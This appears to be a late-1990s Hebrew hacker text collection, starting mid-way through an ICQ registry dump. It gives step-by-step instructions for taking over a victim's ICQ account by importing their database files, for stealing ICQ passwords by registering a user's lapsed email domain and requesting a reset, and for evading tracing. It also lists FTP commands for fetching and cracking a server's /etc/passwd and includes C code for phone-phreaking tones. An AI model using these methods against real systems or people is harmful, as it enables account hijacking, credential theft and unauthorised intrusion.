"PhoneSettings"=dword:00000001"PhonePauseChar"=",""PhoneLocalP"=" "

"PhoneLongP"=" ""PhoneInterP"=" ""Chat RoomName"="Product Support / Suggestion"

"Auto Join Chat Room"="Yes""Novice Counter"=dword:0000000a

"Menu Counter"=dword:00000013"Servers Version"=dword:00000001

"Externals Version"=dword:00000019

"Stats"=hex:60,ff,ea,52,5c,36,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"Novice"="No"

"Dropped Users"=hex:01,00,00,00,43,ca,35,00,e6,02,1f,00

"State Flags"=dword:00000000"Server Msg Version"=dword:0000000b

"Server Msg Shown"=dword:00000001"Server Msg Count"=dword:00000009

"LeftButton Warning"="No""Menu Left Click"="No""Tip Startup"="No"

"Tip Position"=dword:00000000"MoreEvents Warning"="No""Invisible Warning"="No"

"Send Later Warning Off"="No""Busy Warning"="No""Away Warning"="No"

"DND Warning"="No""FT Warning"="No""Ext Warning"="No""Out Warning"="No"

"Chat Warning"="No"

"Away Message"="User is currently away\r\nYou can leave him/her a message"

"Random Comment"="You won't be hurt by things you don't care.\r\n\r\n(c) Calvin's Labs, 1993-1998. No Rights Reserved.\r\nIt's not a secret. It's not a magic. It's not a myth."

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\YOURUIN\Prefs\Presets]

"OutMsg Presets 0"="I'm out'a here. See you tomorrow!"

"DNDMsg Presets 0"="Please do not disturb me now. Disturb me later."

"Away PresetsMsg 0"="Away""Out PresetsMsg 0"="Out for the day"

"Busy PresetsMsg 0"="Busy""DND PresetsMsg 0"="DND""Chat PresetsMsg 0"="Chat"

"AwayMsg Presets 1"="I am out to lunch. I will return shortly."

"OutMsg Presets 1"=""

"DNDMsg Presets 1"="I am currently in a meeting. I can't be disturbed."

"ChatMsg Presets 1"="Come Join my chat room!""Away PresetsMsg 1"="Lunch"

"Out PresetsMsg 1"="Not here""Busy PresetsMsg 1"="Meeting"

"DND PresetsMsg 1"="Meeting""Chat PresetsMsg 1"="Come In"

"AwayMsg Presets 2"="Don't go anywhere! I'll be back in a jiffy!"

"OutMsg Presets 2"="I'm closed for the weekend/holidays."

"DNDMsg Presets 2"="Don't disturb my concentration!"

"ChatMsg Presets 2"="Don't miss out on the fun! Join our chat!"

"Away PresetsMsg 2"="Be right back""Out PresetsMsg 2"="Closed"

"Busy PresetsMsg 2"="Concentration""DND PresetsMsg 2"="Concentration"

"Chat PresetsMsg 2"="Fun"

"AwayMsg Presets 3"="I'm out with the dog. Be back when he's finished."

"OutMsg Presets 3"="Gone fishin'."

"DNDMsg Presets 3"="I'm on the phone with a very important client. Don't disturb me!"

"ChatMsg Presets 3"="What are you waiting for? Come on in!"

"Away PresetsMsg 3"="Dog Walk""Out PresetsMsg 3"="Fishing"

"Busy PresetsMsg 3"="On the Phone""DND PresetsMsg 3"="On the Phone"

"Chat PresetsMsg 3"="Don't Wait""AwayMsg Presets 4"="Went out for a smoke. "

"OutMsg Presets 4"="I'm sleeping. Don't wake me."

"DNDMsg Presets 4"="I can't chat with you now. I'm busy."

"ChatMsg Presets 4"="We'd love to hear what you have to say. Join our chat."

"Away PresetsMsg 4"="Smoke""Out PresetsMsg 4"="Sleeping"

"Busy PresetsMsg 4"="Can't chat ""DND PresetsMsg 4"="Can't chat "

"Chat PresetsMsg 4"="Hear""AwayMsg Presets 5"="On my Coffee break."

"OutMsg Presets 5"="Went home. Had to feed the kids."

"DNDMsg Presets 5"="Can't you see I'm working?"

"ChatMsg Presets 5"="Enter your chat room message here"

"Away PresetsMsg 5"="Coffee""Out PresetsMsg 5"="Kids"

"Busy PresetsMsg 5"="Working""DND PresetsMsg 5"="Working"

"Chat PresetsMsg 5"="Empty""AwayMsg Presets 6"="Went to get some fresh air."

"OutMsg Presets 6"="Gone for good."

"DNDMsg Presets 6"="Enter your occupied message here"

"ChatMsg Presets 6"="Enter your chat room message here""Away PresetsMsg 6"="Air"

"Out PresetsMsg 6"="Gone""Busy PresetsMsg 6"="Conversing"

"DND PresetsMsg 6"="Empty""Chat PresetsMsg 6"="Empty"

"BusyMsg Presets 7"="User is occupied. Only urgent messages will be delivered."

"DNDMsg Presets 7"="Enter your occupied message here"

"ChatMsg Presets 7"="Enter your chat room message here"

"Away PresetsMsg 7"="Empty""Out PresetsMsg 7"="Empty""Busy PresetsMsg 7"="Empty"

"DND PresetsMsg 7"="Empty""Chat PresetsMsg 7"="Empty"

"BusyMsg Presets 0"="User is currently Occupied"

"ChatMsg Presets 0"="I would like to chat about anything"

"BusyMsg Presets 1"="User is currently Occupied1"

"BusyMsg Presets 2"="User is currently Occupied2"

"BusyMsg Presets 3"="User is currently Occupied"

"BusyMsg Presets 4"="User is currently Occupied"

"BusyMsg Presets 5"="User is currently Occupied"

"BusyMsg Presets 6"="User is currently Occupied"

"AwayMsg Presets 7"="User is currently away"

"OutMsg Presets 7"="User is currently N/A"

"AwayMsg Presets 0"="User is currently away\r\nYou can leave him/her a message"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD]

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message0]

"Message"="Please bookmark our network status page."

"URLName"="http://www.mirabilis.com/status.html""URL"="press here""Date"=""

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message1]

"URLName"="http://www.mirabilis.com/emailsig.html"

"URL"="Go to the ICQ e-mail signature generator""Date"=""

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message2]

"Message"="ICQ is doing it again! One more new service from ICQ for your pleasure! Create your ICQ interest group - home, work, family, hobby, affiliation, sports, music...etc..( It's straight forward, no HTML needed! )"

"URLName"="http://www.icq.com/announcements/02.html"

"URL"="It's fun and easy, GO!!""Date"="31-MAR-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message3]

"URLName"="http://www.icq.com/announcements/whitepages.html""URL"="Go!"

"Date"="1-APR-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message4]

"Message"="ICQ can notify you when you receive an e-mail and show you the e-mail headers! Learn how to do it!"

"URLName"="http://www.mirabilis.com/email.html"

"URL"="E-mail notification instructions""Date"="15-JUN-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message5]

"URLName"="http://www.icq.com/announcements/05.html""URL"="Create your Greeting"

"Date"="12-JUL-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message6]

"URLName"="http://www.icq.com/announcements/06.html"

"URL"="Click For More Information""Date"="26-AUG-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message7]

"Message"="ICQ can alert you when you receive Emails and show you the Email headers!"

"URLName"="http://www.icq.com/announcements/07.html""URL"="Learn how to do it"

"Date"="06-SEPT-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message8]

"URLName"="http://www.icq.com/announcements/06.html"

"URL"="Click For More Information""Date"="20-OCT-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups]

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup1]

"Name"="General Chat""Number"=dword:00000001"Version"=dword:00000001

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup2]

"Name"="Romance""Number"=dword:00000002"Version"=dword:00000002

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup3]

"Name"="Games""Number"=dword:00000003"Version"=dword:00000003

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup4]

"Name"="Students""Number"=dword:00000004"Version"=dword:00000004

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup5]

"Name"="20 Something""Number"=dword:00000006"Version"=dword:00000006

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup6]

"Name"="30 Something""Number"=dword:00000007"Version"=dword:00000007

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup7]

"Name"="40 Something""Number"=dword:00000008"Version"=dword:00000008

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup8]

"Name"="50 Plus""Number"=dword:00000009"Version"=dword:00000009

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers]

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers\Server1]

"Host"="icq1.mirabilis.com""Port"=dword:00000fa0

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals]

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Canasta]

"Type"="Command""Command Line"="/ip:"

"Path"="C:\\Program Files\\Canasta\\Canasta.exe"

"URL"="http://ourworld.compuserve.com/homepages/mharte""Version"=dword:0000000f

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Connectix VideoPhone]

"Type"="Extension""Format"="/p:tcp /ac:""Extension"="cvp"

"URL"="http://www.connectix.com/html/videophone.html""Version"=dword:00000009

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Cu-Seeme]

"Type"="Command""Command Line"="""Path"="C:\\CUSEEME\\CUSEEM32.EXE"

"URL"="http://www.cu-seeme.com/""Version"=dword:00000006

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\IRIS Phone]

"Type"="Extension""Format"="""Extension"="iru""URL"="http://irisphone.com/"

"Version"=dword:0000000a

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat]

"Type"="ServerExtension""Format"="1.1\\n-u 1 -a ""Extension"="vce"

"NumParameters"=dword:00000002"Server1"="vchat1.microsoft.com"

"URL"="http://vchat1.microsoft.com""Version"=dword:00000011

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param1]

"ParamName"="World""CanOtherChange"="No""Param1"="#Compass""Param2"="#BugWorld"

"Param3"="#Fishbowl""Param4"="#Lodge""Param5"="#Lunar""Param6"="#Lodge"

"Param7"="#Practice""Param8"="#RedDen""Param9"="#TableTop"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param2]

"ParamName"="Avatar""CanOtherChange"="Yes""Param1"="Amani""Param2"="Anderson"

"Param3"="Brb""Param4"="Cat""Param5"="Crab""Param6"="Dancer""Param7"="Dred"

"Param8"="Duggan""Param9"="Joey""Param10"="Lulu"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Netscape CoolTalk]

"Type"="Command""Command Line"=""

"Path"="C:\\Program Files\\Netscape\\Navigator\\CoolTalk\\CoolTalk.EXE"

"URL"="http://home.netscape.com/comprod/products/navigator/version_3.0/communication/cooltalk/index.html"

"Version"=dword:00000004

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Rikken on the Rockx]

"Type"="ClientServer""Client Command Line"="/CLIENT %i"

"Server Command Line"="/SERVER""Client Path"="C:\\Rikken\\Rikken.exe"

"Server Path"="C:\\Rikken\\Rikken.exe""URL"="http://www.dse.nl/~ramon/rikken/"

"Version"=dword:00000017

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VDOPhone]

"Type"="Extension""Format"="callto://""Extension"="vdp"

"URL"="http://www.vdo.net/download/""Version"=dword:00000003

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VidCall]

"Type"="Command""Command Line"="""Path"="C:\\VidCall\\Corp.EXE"

"URL"="http://www.access.digex.net/~vidcall/vidcall.html"

"Version"=dword:00000008

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\WebPhone]

"Type"="Extension""Format"="""Extension"="wpc""URL"="http://www.webphone.com/"

"Version"=dword:00000007

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Quake]

"Type"="ClientServer""Client Command Line"="-mpath +connect %i"

"Server Command Line"="-mpath -listen""Client Path"="c:\\quake_sw\\Q95.bat"

"Server Path"="c:\\quake_sw\\Q95.bat""Server1"="quake.xmisson.com"

"URL"="http://www.idsoftware.com""Version"=dword:00000010

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat]

"Type"="ServerCommand""Format"="GROUPNAME=i PORT=15000"

"Path"="C:\\Program Files\\VoxChat\\VoxChat.exe""NumParameters"=dword:00000001

"Server1"="voxchat1.voxware.com""Server2"="voxcha2.voxware.com"

"URL"="http://www.voxchat.com/low/download.htm"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat\Param1]

"ParamName"="Room""CanOtherChange"="No""Param1"="#ICQ"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\PhoneLocations]

"LastUpdate"=dword:00000000

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Main]

"SelectedCell"=dword:00000000"AlwaysOnTop"="Yes""LeftBarWidth"=dword:000000ad

"RightBarWidth"=dword:000000ad"FloatBar-Left"=dword:00000255

"FloatBar-Right"=dword:00000307"FloatBar-Top"=dword:00000033

"FloatBar-Bottom"=dword:000001f3"State"="Floating""Minimized"="No"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Windows]

"Response"=dword:008f00c9"SearchWiz"=dword:006f00c0"NotifyWiz"=dword:006f00c0

"posNovice"=dword:009300dc"posMOTD"=dword:00af00b7"posMenuConfig"=dword:00a900e7

"RemoveUIN"=dword:00bb0108"Message"=dword:008b004f"Security"=dword:007400b4

"Prefs"=dword:007f00ae"History"=dword:0096003a"File Request"=dword:009000f0

"FileTransfer"=dword:009700ae"Info"=dword:009300d2"FetchUser"=dword:00e9010e

"URL Message"=dword:00a00069"Away"=dword:00bd00f7"Chat Request"=dword:009f00dd

"Contacts List"=dword:008300bd"Chat"=dword:008b00f5"Phone"=dword:000a000a

"Phone Call Request"=dword:007700e5

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Search]

"Place"=dword:00a400cc"Type"=dword:00000002"Width"=dword:01880188

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\ICQ Chat]

"ChatStyle Counter"=dword:00000003"Pen Color"=dword:0080ffff

"Back Color"=dword:00004000"Send Focus"="Yes""Enable Sounds"="Yes"

"Name Bars"="Yes""Always On Top"="No""AutoColor"="No""OverRide Format"="Yes"

"Show Toolbar"="Yes""State"=dword:00010000"New Font Name"="Times New Roman"

"Char Set"=dword:00000000"IRCListWidth"=dword:00000006

"Font Pitch"=dword:00000012"New Font Height"=dword:0000000e

"Font Effects"=dword:00000000"AutoColor 0"=dword:00000000

"AutoColor 1"=dword:00000080"AutoColor 2"=dword:00008000

"AutoColor 3"=dword:00008080"AutoColor 4"=dword:00800000

"AutoColor 5"=dword:00800080"AutoColor 6"=dword:00808000

"AutoColor 7"=dword:00808080"AutoColor 8"=dword:00c0c0c0

"AutoColor 9"=dword:000000ff"AutoColor 10"=dword:0000ff00

"AutoColor 11"=dword:0000ffff"AutoColor 12"=dword:00ff0000

"AutoColor 13"=dword:00ff00ff"AutoColor 14"=dword:00ffff00

"AutoColor 15"=dword:00ffffff"Place-Left"=dword:0000000a

"Place-Right"=dword:000001fe"Place-Top"=dword:0000000a

"Place-Bottom"=dword:0000021a"New LogFile name"="ICQChatLog.txt"

"New SaveFile name"="ICQChatSave.txt"

 

[credit abt the reg key to http://i.am/devil crew]

 

3. שמרו את הקובץ כקובץ REG.

**** אם יש לכם תוכנת איסיקיו פתוחה סגרו אותה.

4. העתיקו את הקבצים שהשגתם בהתחלה (idx,dat) לתיקית ה - DB

של האיסיקיו שלכם. (ex. c:\progra~1\icq\db)

5.הריצו את הקובץ REG שכתבתם זה עתה. זה ישאל אתכם אם ברצונכם..בלהבלה... הקישו כן !

6. הריצו את תוכנת ה - dbconvert דרך התפריט של האיסיקיו בתפריט ההתחלה(או דרך התיקיה עצמה).

לחצו על : "Convert a old DB"

זה יתחיל לחסל את המנוי הישן ואמור לפתוח אוטומטית את האיסיקיו עם המשתמש החדש (הקורבן).

אם זה לא נתפח לבד , פתחו זאת בעצמכם.

אם זה לא עובד עדיין על המספר של הקורבן שלכם עשו זאת :

click ICQ menu, click on "Add/Change Current User", then click on "Change the Active User".

Choose the UIN of the victim.

זה יכול לבקש ממכם סיסמא, למה זה קורה אתם שואלים ? יש שתי סיבות עיקריות :

א. הופעלה הגנת קראקים על המספר שאתם מתלבשים עליו אז תשכחו מלגלות עליו דברים.

ב. המספר נמצא אוןליין אז אתם צריכים לחכות עד שהוא יהיה אוף-ליין. ואז אתם בעצם הוא/היא. !

בהצלחה !

 

תוסף ע"י The-MOD - חבר קרוב ועוזר לארגון. ותודה ל Rul3R על הניסוח של התוסף.

השגת סיסמאות של מספרי איסיקיו:

מה צריך ? צריך רק למצוא משתמש שכתב באי-מאיל שלו כתובת שלא קיימת icq בשביל להשיג מספר ב

לדוגמא:

אם מישהו רשם למשל:

[email protected]

נכנסים לאחד מהאתרים שמביאים לרשום דומינים בחינם והם מביאים גם אי-מאיל

( www.namedemo.com / www.namezero.com )

ושם רושמים את הכתובת

asdf.com

אחרי שרושמים את הכתובת הזאת

פותחים חשבון דואר באתר שבו רשמתם את הדומין

ושהדואר שאתם פותחים יהיה

[email protected]

אחרי שפותחים את כתובת הדואר

נכנסים לאתר : www.icq.com/password

של מי שבחרתם icq-ושם כותבים את מספר ה

אם עשיתם את כל השלבים נכון

הסיסמא של המספר תשלח לדואר שלכם

( [email protected] )

הצעות: כדאי לקחת מספר שהוא גם מספר הטלפון\האישי שלך שיהיה קל לזכור

נכתב ע"י The-MOD , נוסח ע"י Rul3R ונכנס כתוסף לטקסט של Pirs[i]ng.

בקשות או כל דבר אחר ל The -MOD לשלוח ל:

[email protected]

By The-MOD

 

מה היא פריצה + דוגמה

 

מה במדריך זה:

* מה זה פריצה ? ולמה ?

* איך להיזהר בזמן הפריצה ?

* Proxy

* הסבר על פריצה אתרי אף.טי.פי והוצאת קובץ סיסמאות.

* מאגרי מידע מומלצים.

 

מה זה פריצה ? ולמה ?

 

פריצה בעברית נכונה היא כניסה/לגנוב גישה למקום שאין לך גישה לשם.

להיכנס למקום/אזור/מערכת/רשת שאתה לא מורשה להיות שם,

אבל אתה בכל זאת אתה נכנס ע"י פריצה למקום/אזור/מערכת/רשת.

פריצה היא לא חוקית גם במחשבים וגם בחיים האמיתיים, ויש מדינות שעושות סיפור ממש גדול מזה.

למשל בישראל אתה לא כל כך חוטף על הראש עם תופסים אותך אבל אם בבריטניה אתה נתפס,

אתה מקבל עונש כמו טרוריסט, למרות שכולם יודעים שזה לא אותו דבר אבל ככה הם ה"חיים".

פריצה בכלליות היא חילול הקוד שמנהל מקום/אזור/מערכת/רשת קבע ואף לפעמים שינוי הקוד.

באקדור הוא נושא אהוב על האקרים והוא משמש ועוזר להאקר לחדור למקום/אזור/מערכת/רשת.

שורות קוד שמישהו הכניס במכוון כדי לאפשר לעצמו (בד"כ) גישה למשהו על מחשב אחר יותר בקלות..

לדוגמא קוד שיפתח פורט מסויים רק לאי פי מסויים ויתן לו לכתוב שם פקודות קבועות שיבצעו

פעולה כלשהי לפי מה שמכין הבאקדור קבע.

לפעמים האקרים אשר מצאו את הבאקדור מנצלים את זה ומכינים כמה נוספים

כדי שהפריצה הבאה למערכת תהיה פשוטה יותר.

למה פורצים אתם רוצים לדעת ?

אני חושב שיש שתי קטגוריות לרצון של אנשים לפרוץ.

 

א. האקר "טוב" - האקר טוב לא יפרוץ למקום/אזור/מערכת/רשת כדי להרוס או לשים את החותמת שלו,

לשים את השם שלו ולצפות שיראו בחדשות שהוא פרץ וצריך לפחד ממנו כו', הוא לא יפרוץ בשביל מטרה רעה.

הוא יפרוץ, אם בכלל למקום/אזור/מערכת/רשת כדי להראות למנהל הרשתת שיש לו בעיה איפשהו.

ישאיר חותמת ולא ימחק את הלוגים או יהרוס משהו. המטרה שלו היא לעשות טוב !!!

ה זה מתחלק לשני חלקים:

1. מנהל הרשת יודה להאקר שהודיע לו על הבעיה  ואף אולי יצ'פר אותו איכשהו.

2. מנהל הרשת לא יקבל את כטובה וידווח עליו לרשויות ומשם זה מתפצת לעוד שני חלקים (תסתכלו יותר למטה).

 

ב. האקר "רע" - הוא ההפך המושלם (או שלא) מההאקר הטוב, הוא יפרוץ למקום/אזור/מערכת/רשת כדי,

להשליט טרור (קצת מוגזם) ולהרוס את מה שהוא הגיע  אליו.

הוא ישאיר חותמת שהוא הרס את זה בגלל שבלה בלה, ובלה בלה.

קרוב לוודאי שהוא יהרוס את כל הקבצים במערכת וימחק את הלוגים (LOGS).

הוא לא יעשה שום דבר טוב אלא רק יעשה את זממו, שהוא דבר רע.

מפה העניין מת]צל לשני חלקים.

1. יתפסו אותו , יקנסו אותו, יהיה משפט, הוא יקבל עונש, לא יגע במחשב 20 שנה וימות מזקנה.

2. לא יתפסו אותו, לא יקנסו אותו, לא יהיה משפט, הוא לא יענש, הוא יהרוס עוד אתר ומשם זה ממשיך.

אולי יתפסו ואולי לא. העונש על פריצה הוא תמיד כבד , אבל יש מדינות שהוא יותר מדי כבר.

תודה ל- ...

 

איך להיזהר בזמן הפריצה ?

 

קודם כל הכי חשוב, בכלל לא כדאי לפרוץ אלא אם אתם בטוחים שאתם יודעים איך להיזהר.

הנה פה כמה שיטות נחמדות להגן על עצמכם.

יש כאלה אנשים שאומרים לא לפרוץ מהבית, ויש כאלה שאומרים לחייג *43 שלא יאתרו מאיפה אתה מתקשר.

כל אלה נכונים במקצת.

& לידע אישי, *43 לא חוסם את השיחה אלא מונע *42. במכשירי שיחה מזוהה רגילים זה מונע את הצגת המספר,

אבל בחברות אינטרנט וכל מה שיש לו ציוד רציני זה ימנע *42 ולא יותר.

השיטה הכי טובה לא להיתפס, היא לא לעשות את זה אבל אם בכל מקרה אתם רוצים אז הנה:

 

1. תנסו להסוות את האיפי / הוסט / סבנט מסק שלכם.

אם אתם יכולים אפילו את המספר טלפון שעליו אתם מתחברים לאינטרנט , לא דרך *43 אלא דרכים אחרות אם אתם מכירים.

 

2. תתחברו דרך כמה שיותר תחנות שידור כדי שיהיה קשה להגיע אליכם. (proxy וכו').

 

3. עשו ספופ ממש חזק לאיפי שלכם שגם עוד שנה לא יגיעו אליו.

 

4. תנסו לא לפרוץ מהבית כי זה באמת עוזר אבל זה תלוי, אם יש לכם מקום שאתם יכולים להיות שם הרבה זמן,

ולא יחדשו בכם או לא יגיעו אליכם לאחר המעשה, אז לכו על זה.

 

5. כמו כן השיטה לדעתי הכי טובה , היא להתחבר לקו טלפון של מישהו ומשם להתחבר לאינטרנט ולעשות את זממכם.

לעוד מידע איך לעשות על זה לכו לטקסטי הפריקינג שלנו וחפשו מידע ברחבי הרשת .

 

Proxy.

 

שרת המוקם על ידי ספקי שירות (חברות אינטרנט, חברות גדולות וכו') למען לקוחותיו ותפקידו ליצור

קשר עם מחשבים ברשת ולשלוף מהם מידע על פי בקשת הגולשים. לשרת הפרוקסי חיבור מהיר הרבה יותר

משל הגולש הממצוע עם המודם ולכן משמש כמקום מהיר בהרבה לקבלת קבצים ממנו.

אם הרבה אנשים מבקשים את אותו קובץ - הקובץ נשמר בשרת הפרוקסי, ובכך חוסך לגולשים את ההמתנה

לקבלת המידע משרת האינטרנט המרוחק. על שרתי פרוקסי יש גם הגנה ולכן הם יכולים לשמש כפיירוול.

ככה כל העניין הזה עובד:

 

PC-MODEM |  ----->    | PROXY |  ----->   | SITE |  |    

 

       

 

הסבר על פריצה אתרי אף.טי.פי והוצאת קובץ סיסמאות.

 

מהו בעצם אף.טי.פי (FTP) ?

FTP - File Transport Protocol, הוא פרוטוקול אשר משמש אותנו ואת אחרים להעברת קבצים באינטרנט.

כדי לגשת לאתר אף.טי.פי של מישהו צריך שם משתמש וסיסמא, אפשר גם להיכנס כאנונימי , אורח.

אבל אם אתה נכנס כאורח קרוב לוודאי שתמיד תוכל רק לצפות שמה שיש וכל מה שיש באתר,

הופך להיות למצב "קריאה בלבד". אי אפשר להוריד את זה למחשבך האישי.

עכשיו יש לכם פה הסבר על פריצה לאתר אף.טי.פי והוצאת קובץ הסיסמאות של האתר, ואז,

אפשר לגשת לאתר אף.טי.פי ללא ידיעתו של האדמין כי הוא לא יודע שיש לך את הסיסמא.

אוקי הנה השיטה רק, תזהרו במה שאתם עושים אם זה.

 

1. לכו ותפתחו לכם חלון דוס, פרומט דוס (Dos Promt).

 

2. הקישו את הרצף הבא:

   ftp ftp.server-to-hack.com

 

3. עכשיו אתה אמורים להקיש שם משתמש, נכון ? אל תקישו כלום, לחצו על אנטר (Enter).

 

4. עכשיו אתה אמורים להקיש סיסמא, נכון ? אל תקישו כלום, לחצו על אנטר (Enter).

 

5. הקישו את הרצף הבא: quote user ftp.

 

6. עכשיו את זה: quote cwd ~root.

 

7. ועכשיו את זה: quote pass ftp. (בלי הנקודה ובלי הנקודתיים).

 

8. עכשיו אתם מחוברים, הקישו את זה : cd etc.

 

9. עכשיו אתם בתיקיה etc, הקישו : get passwd.

 

אם עשיתם הכל נכון אז הקובץ של הסיסמאות אמור לרדת לכונן הקשיח שלכם ומשם אתם לבד.

אם הוא מוצפן בדרך כלשהי, נסו לעשות אם זה משהו,

תחשבו אלי איך לפצח אותו או תורידו תוכנות שתעשה את זה (לא חסר תוכנות כאלה).

ואם הקובץ לא מוצפ אז זה חסך לכם עבודה ! ועבודה רבה !

משם תעשו מה שאתם רוצים אם מה שאתם מוצאים.

 

&&& כל מה שאתם מקישים, הקישו בלי הנקודה ובלי הנקודתיים.

 

&&&& הערה חשובה !!!! זה לא יעבוד על כל האתרים וכל כל המערכות.

     אז אם זה לא עובד לכם , אל תבואו בטענות אלי !

     אני אישית יודע שזה עובד על אתרים מסוימים.

 

By Pirs[i]ng

 

יצירת טונים בשפת C

 

תוכן העניינים

-------------

 

1. טונים

2. מבט ראשוני

3. מבט שני

4. פקודות

5. ערבוב טונים

 

 

1. טונים

 

 טונים הוא בעצם צליל, או סדרה של תווים, אשר רצית בתדירות מסויימת .

טון מסוים ואני משמיע אותו בטלפון ציבורי מסוים זה עושה משהו ...

יש המון טונים : לניתוק הטלפון , לקופסאות וכ'ו ...

 

2. מבט ראשוני

 

#include<stdio.h>

#include<dos.h>

 

void main()

{

                                                                    

Sound(1800);

Delay(1000);

Nosound();

 

}

 

 

3. מבט שני

 

מה בעצם כל זה עושה ?

התוכנה מפעילה טון 1800

לשנייה , ואז מפסיקה אותו ...

 

#include<stdio.h>

#include<dos.h> /* for delay() */

 

void main()

{

                                                                    

Sound(1800); /* Sound of 1800mhz */

Delay(1000); /* For Sec */

Nosound(); /* stop the sound */

 

}

 

4. פקודות

---------

 

1. sound(*); - ה * מסמן את הצליל בתדירות שאתה רוצה

 

2. dealy(*); - ה * מסמן את הזמן שאתה רוצה לחכות במילי שניות

 

3. nosound(); - מפסיק את הצליל

 

 

5. ערבוב טונים

--------------

 

אם אתם רוצים לערבב טונים אז ככה צריכה להיות התוכנה

 

#include<stdio.h>

#include<dos.h>

 

void main()

{

                                                                    

Sound(1000);

Sound(200);

Delay(1000);

Nosound();

 

}

מה שקורה פה , התוכנה מפעיל שני צלילים אחד בתדירות 1000 , והשני

בתדירות 2000 . אז היא מחכה 1000 מילי שניות שזה שנייה אחת , ואז מפסיקה

את הצלילים . זה הכל ...

 

אתם יכולים לערבב המון צלילים ביחד , אבל לא יצא מזה משהו מועיל .

 

By Boba Smith

 

תיקונים Razor

כבלים

איזה סוגים יש ומה צריך לדעת עליהם ! / Pir[s]ing

 

